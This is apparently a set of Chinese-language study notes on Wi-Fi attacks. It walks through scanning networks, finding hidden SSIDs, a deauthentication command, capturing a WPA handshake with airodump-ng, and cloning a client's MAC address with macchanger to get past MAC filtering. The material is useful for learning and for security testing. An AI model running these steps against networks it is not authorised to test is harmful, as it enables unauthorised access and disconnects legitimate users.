由于硬件原因,此处仅对WPA/WPA2进行分析{mac地址过滤}
扫描wlan
iw dev wlan0 scan
iwlist wlan0 scanning [essid]
- 发现隐藏wlan
混杂模式下,Wireshark抓包
Frames | Description |
---|---|
信标帧{发现隐藏的wifi} | wlan.fc.type0 && wlan.fc.type_subtype8 |
断线重连帧 aireplay -0 -a -c wlan0mon --> 解除验证数据包 | wlan.fc.type_subtype == 0x0c |
mac地址过滤
将mac地址加入黑名单,阻止客户端上网
操作:
- 通过airdump监听抓包获取活跃客户端mac
root@yue:~/Pictures# airodump-ng --bssid 78:EB:14:B9:96:6E -c 10 wlan1mon
CH 10 ][ Elapsed: 10 mins ][ 2019-12-29 16:32 ][ WPA handshake: 78:EB:14:B9:96:6E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
78:EB:14:B9:96:6E -28 56 5655 11311 3 10 270 WPA2 CCMP PSK FAST_966E
BSSID STATION PWR Rate Lost Frames Probe
78:EB:14:B9:96:6E 9C:2E:A1:AD:68:99 -12 1e- 6e 6 11971 78:EB:14:B9:96:6E F0:C9:D1:74:0E:FB -52 1e- 1e 0 346 FAST_966E
- mac地址修改工具,修改mac地址:
root@yue:~# ifconfig wlan0 down
root@yue:~# macchanger -m 9C:2E:A1:AD:68:99 wlan0
Current MAC: 80:2b:f9:72:21:89 (unknown)
Permanent MAC: 80:2b:f9:72:21:89 (unknown)
New MAC: 9c:2e:a1:ad:68:99 (unknown)
root@yue:~# ifconfig wlan0 up
root@yue:~# iwconfig wlan0
wlan0 IEEE 802.11 ESSID:"FAST_966E"
......